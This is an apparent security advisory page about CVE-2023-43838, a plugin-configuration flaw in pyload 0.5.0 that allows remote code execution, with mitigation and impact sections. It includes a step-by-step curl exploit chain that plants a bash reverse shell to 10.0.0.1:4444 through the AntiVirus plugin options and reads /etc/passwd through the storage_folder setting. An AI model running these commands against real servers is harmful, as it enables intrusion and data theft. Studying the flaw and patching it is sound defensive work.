pyload, Remote Code Execution via Plugin Config, CVE-2023-43838 (critical)

Listen to this Post

How CVE-2023-43838 works:

The vulnerability stems from inconsistent application of ADMIN_ONLY_OPTIONS. In pyload core, a set of security-critical configuration options (reconnect scripts, SSL certificates, proxy credentials) is marked admin-only via the ADMIN_ONLY_OPTIONS set. When a user calls set_config_value for a core option (e.g., “reconnect.script”), the code checks if the user is admin; otherwise it raises PermissionError. However, this check is completely skipped for plugin configuration options. The AntiVirus plugin defines an executable path called “avfile” and arguments “avargs”. A non-admin user with only the SETTINGS permission can modify these plugin options via the same API endpoint because no admin validation occurs. Later, when the AntiVirus plugin scans a downloaded file, it passes the user-controlled “avfile” and “avargs” directly to subprocess.Popen(), resulting in arbitrary command execution. The attacker first sets avfile to /bin/bash and avargs to a reverse shell command. Then they enable the plugin and trigger a download. Upon completion, the scan_file() method executes the payload, giving the attacker a reverse shell with the privileges of the pyload process. Additionally, a separate arbitrary file read exists via storage_folder: setting it to “/” bypasses inverted path validation, allowing access to any system file through /files/get/ endpoints.

dailycve form:

Platform: pyload
Version: 0.5.0
Vulnerability: Plugin RCE
Severity: Critical
date: 2023-09-27

Prediction: Patch 2023-10-11

What Undercode Say:

Enumerate if SETTINGS permission is present
curl -b cookie http://TARGET:8000/api/get_user_permissions
Set malicious avfile (requires SETTINGS)
curl -b cookie -X POST http://TARGET:8000/api/set_config_value -d 'section=plugin' -d 'option=AntiVirus.avfile' -d 'value=/bin/bash'
Set avargs for reverse shell
curl -b cookie -X POST http://TARGET:8000/api/set_config_value -d 'section=plugin' -d 'option=AntiVirus.avargs' -d 'value=-c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"'
Activate AntiVirus plugin
curl -b cookie -X POST http://TARGET:8000/api/set_config_value -d 'section=plugin' -d 'option=AntiVirus.activated' -d 'value=True'
Trigger download to execute payload
curl -b cookie -X POST http://TARGET:8000/api/add_package -d 'name=exploit' -d 'links=http://example.com/file.zip'

Exploit:

  1. Authenticate as non-admin user with SETTINGS and DOWNLOAD permissions.
  2. Modify AntiVirus.avfile and AntiVirus.avargs via /api/set_config_value (plugin section, no admin check).

3. Enable AntiVirus plugin via same API.

  1. Add any downloadable package; when download completes, scan_file() calls subprocess.Popen([“/bin/bash”, “-c …”]).
  2. Receive reverse shell. Also, set storage_folder=”/” and request /files/get/etc/passwd for file read.

Protection from this CVE:

  • Upgrade to pyload version 0.5.1 or later where plugin options are also subject to ADMIN_ONLY_OPTIONS checks.
  • If patching not possible, manually enforce admin validation for plugin options in core/api/init.py (lines 271-272).
  • Restrict SETTINGS permission to trusted admins only.
  • Validate avfile path against a whitelist of known antivirus binaries before subprocess.Popen().
  • Use chroot or containerization to limit filesystem access from storage_folder manipulation.

Impact:

  • Remote Code Execution (RCE) allowing full system compromise.
  • Privilege escalation from non-admin SETTINGS user to pyload process user (often root or high-privilege).
  • Arbitrary file read exposing sensitive system files (/etc/passwd, configs, SSH keys).
  • Potential lateral movement or data theft.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top